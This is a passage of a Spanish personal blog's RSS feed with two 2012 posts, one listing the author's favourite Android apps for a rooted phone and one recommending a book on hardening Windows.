<br />Filed under: <a href='http://seifreed.com/category/personal/'>Personal</a> Tagged: <a href='http://seifreed.com/tag/personal/'>Personal</a>, <a href='http://seifreed.com/tag/trabajo/'>trabajo</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4051/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4051/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4051/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4051&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/02/07/erase-un-hombre-a-un-trabajo-pegado/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>
	</item>
		<item>
		<title>Mis aplicaciones para Android I</title>
		<link>http://seifreed.com/2012/01/16/mis-aplicaciones-para-android-i/</link>
		<comments>http://seifreed.com/2012/01/16/mis-aplicaciones-para-android-i/#comments</comments>
		<pubDate>Mon, 16 Jan 2012 20:58:09 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[app]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[market]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4042</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Desde que me compré el Nexus One mucha de la gente que ya tenía Android me había pedido que pusiese que aplicaciones había usado o que me parecían interesantes. Es algo que he ido retrasando pues al final te quedas con aquellas aplicaciones que mas te sirven y de echo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4042&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p><span style="font-family:Times New Roman;font-size:small;">Desde que me <a href="http://seifreed.com/2011/03/11/dos-nuevos-equipos-en-mi-poder-mac-book-y-nexus-one/">compré el Nexus One</a> mucha de la gente que ya tenía Android me había pedido que pusiese que aplicaciones había usado o que me parecían interesantes.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">Es algo que he ido retrasando pues al final te quedas con aquellas aplicaciones que mas te sirven y de echo he probado muchas, pero o saturas el teléfono o te acabas volviendo un poco loco de la cantidad que hay. Cabe decir que pondré tanto aplicaciones que necesiten root como las que no, dando por echo que se tiene el telefono rooteado.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">Lo primero para empezar es tener rooteado el teléfono en mi caso, por ejemplo, yo usé Cyanogenmod en su última versión, una vez instalado, se empieza con las aplicaciones.</span></p>
<p><span style="font-family:Times New Roman;font-size:small;">La primera es <a href="https://market.android.com/details?id=com.keramidas.TitaniumBackup&amp;hl=es">Titanium Backup</a></span></p>
<p><span style="font-family:Times New Roman;font-size:small;"><img class="alignleft" src="http://img864.imageshack.us/img864/7886/titanium.png" alt="" width="94" height="91" /></span></p>
<p>Este software es capaz de hacerte la vida mucho más fácil, para empezar, te permite mover mediante lotes (scripts programados) la ejecución de tareas como, mover todas las aplicaciones que lo permiten a la SD. Además de hacer backups automáticos, permite incluso que lo puedas sincornizar con el Dropbox, una maravilla sin duda <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><a href="http://www.kaspersky.com/downloads/productupdates/mobile_for_android">Kaspersky</a></p>
<p><img class="alignnone" src="http://androidheadlines.com/wp-content/uploads/2010/10/Kaspersky-logo1.jpg" alt="" width="101" height="73" /></p>
<p>El tema de tener antivirus en Android creo, ya no se puede discutir, de echo las predicciones para el 2012 es que el malware en Android aumente un 6000 %, así que por si acaso es mejor estar protegido. Este software te permite incluso mediante la recepción de SMS ejecutar acciones sobre el dispositivo, como un auto-wipe por ejemplo.</p>
<p><a href="https://market.android.com/details?id=com.geomobile.tmbmobile&amp;feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5nZW9tb2JpbGUudG1ibW9iaWxlIl0.">TMB</a></p>
<p><img class="alignnone" src="http://seifreed.files.wordpress.com/2012/01/tmb2bvirtual2bfor2biphone2b3gs2band2biphone2b42bon2bthe2bitunes2bapp2bstore2b-2bflock.jpg?w=75&#038;h=65" alt="" width="75" height="65" /></p>
<p>Esto solo si vivis en Barcelona y viajáis en transporte público os servirá para saber cuanto tarda el próximo autobús en venir. Para mi imprescindible!</p>
<p><a href="https://market.android.com/details?id=mobi.mgeek.TunnyBrowser&amp;feature=search_result">Dolphin Browser</a></p>
<p><img class="alignnone" src="http://androiiid.com/wp-content/uploads/2011/05/dd1e1a6243fcabb1.png.png" alt="" width="68" height="69" /></p>
<p>El tema del navegador es algo que es bastante importante pues se necesita un navegador que sea rápido que puedas configurar medida y ese es el caso de Dlphin Browser. Con Dolphin podemos agregar complementos usar gestos para realizar ciertas acciones etc&#8230;</p>
<p><a href="https://market.android.com/details?id=com.dropbox.android&amp;feature=search_result#?t=W251bGwsMSwxLDEsImNvbS5kcm9wYm94LmFuZHJvaWQiXQ..">Dropbox</a></p>
<p><img class="alignnone" src="http://a0.twimg.com/profile_images/480262550/box.png" alt="" width="115" height="83" /></p>
<p>No hace falta que os hable sobre esta aplicación ya.. es bastante usada para compartir archivos entre pc, movil, ipad, linux de lo que necesites la cuenta gratuita tiene hasta 2GB de almacenamiento gratuito.</p>
<p>Hasta aquí mi primera pequeña lista de aplicaciones, mañana mas y mejor  <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Saludos</p>
<br />Filed under: <a href='http://seifreed.com/category/general/'>General</a> Tagged: <a href='http://seifreed.com/tag/android/'>android</a>, <a href='http://seifreed.com/tag/app/'>app</a>, <a href='http://seifreed.com/tag/google/'>google</a>, <a href='http://seifreed.com/tag/market/'>market</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4042/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4042/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4042/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4042&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/16/mis-aplicaciones-para-android-i/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://img864.imageshack.us/img864/7886/titanium.png" medium="image" />

		<media:content url="http://androidheadlines.com/wp-content/uploads/2010/10/Kaspersky-logo1.jpg" medium="image" />

		<media:content url="http://seifreed.files.wordpress.com/2012/01/tmb2bvirtual2bfor2biphone2b3gs2band2biphone2b42bon2bthe2bitunes2bapp2bstore2b-2bflock.jpg?w=195" medium="image" />

		<media:content url="http://androiiid.com/wp-content/uploads/2011/05/dd1e1a6243fcabb1.png.png" medium="image" />

		<media:content url="http://a0.twimg.com/profile_images/480262550/box.png" medium="image" />
	</item>
		<item>
		<title>Recomendación de Domingo: Libro´&#8221;Máxima seguridad en Windows&#8221;</title>
		<link>http://seifreed.com/2012/01/15/recomendacion-de-domingo-libro%c2%b4maxima-seguridad-en-windows/</link>
		<comments>http://seifreed.com/2012/01/15/recomendacion-de-domingo-libro%c2%b4maxima-seguridad-en-windows/#comments</comments>
		<pubDate>Sun, 15 Jan 2012 11:18:20 +0000</pubDate>
		<dc:creator>Marc Rivero López</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[informatica64]]></category>
		<category><![CDATA[maxima seguridad en Windows]]></category>

		<guid isPermaLink="false">http://seifreed.com/?p=4037</guid>
		<description><![CDATA[Hola! Muy buenas a todos/as! Intentaré los Domingos por cambiar un poco el asunto poner alguna recomendación de páginas/proyectos/libros que esté leyendo  actualmente o bien que sean de mi interés. En el artículo de hoy tráigo uno de los libros que mas me ha gustado de carácter técnico. El libro es &#8220;Máxima Seguridad en Windows&#8221; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4037&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hola!</p>
<p>Muy buenas a todos/as!</p>
<p>Intentaré los Domingos por cambiar un poco el asunto poner alguna recomendación de páginas/proyectos/libros que esté leyendo  actualmente o bien que sean de mi interés.</p>
<p>En el artículo de hoy tráigo uno de los libros que mas me ha gustado de carácter técnico. El libro es &#8220;<a href="http://www.informatica64.com/libros.aspx">Máxima Seguridad en Windows</a>&#8221; el libro editado por <a href="http://www.informatica64.com/">Informática64</a> y escrito por el<a href="https://twitter.com/ssantosv"> GRAN Sergio de los Santos</a> cubre aquellas necesidades que la gente necesita sobre securizar su Windows.</p>
<p>Sergio tiene mucha experiencia con malware y con sistemas Windows, es un crack y lo puedes obervar en charlas a las que he podido verle como por ejemplo en el <a href="http://seifreed.com/2011/10/24/aseguraitcamp-3/">Asegura IT Camp 3</a> donde dió una charla en la que pude ver en directo el pedazo de profesional que es.</p>
<p>Y respecto al libro obervando el índice que ya vi en el Asegura IT Camp 3 me entraron muchas ganas de leerlo. El <a href="http://www.informatica64.com/RecursosLibros/seguridadwindows.pdf">índice lo podemos ver aquí</a>.</p>
<p>Cuando empecé la lectura del libro tenía muy claro que acabaría aplicando fuego purificador a mi instalación de Windows es decir, formateando la instalación actual y volver a instalar Windows 7 y configurarlo de manera seguro. Ya he retocado cosas del registro, cambiado el UAC configurado el firewall desde cero&#8230; he aprendido muchas cosas internas de Windows y que NO conocía, pero que de momento puedo ir tranquilo sion antivirus porque yo se que aplicaciones hacen cada cosa en mi sistema operativo.</p>
<p>Desde luego una lectura recomendada.</p>
<p>Podéis adiquirir el libro <a href="https://www.informatica64.com/Ventadelibros/default.aspx">aquí</a></p>
<p><img class="aligncenter" src="http://www.informatica64.com/imagenes/swindows150.jpg" alt="" width="150" height="194" /></p>
<p>Así que ya sabéis haced vuestro pedido</p>
<p>Saludos</p>
<p>&nbsp;</p>
<br />Filed under: <a href='http://seifreed.com/category/general/'>General</a> Tagged: <a href='http://seifreed.com/tag/informatica64/'>informatica64</a>, <a href='http://seifreed.com/tag/maxima-seguridad-en-windows/'>maxima seguridad en Windows</a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/seifreed.wordpress.com/4037/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/seifreed.wordpress.com/4037/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/seifreed.wordpress.com/4037/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=seifreed.com&amp;blog=1473574&amp;post=4037&amp;subd=seifreed&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://seifreed.com/2012/01/15/recomendacion-de-domingo-libro%c2%b4maxima-seguridad-en-windows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://1.gravatar.com/avatar/1e239b704116f53f06c340ef742d14a0?s=96&#38;d=wavatar&#38;r=G" medium="image">
			<media:title type="html">seifreed</media:title>
		</media:content>

		<media:content url="http://www.informatica64.com/imagenes/swindows150.jpg" medium="image" />
	</item>
	</channel>
</rss>
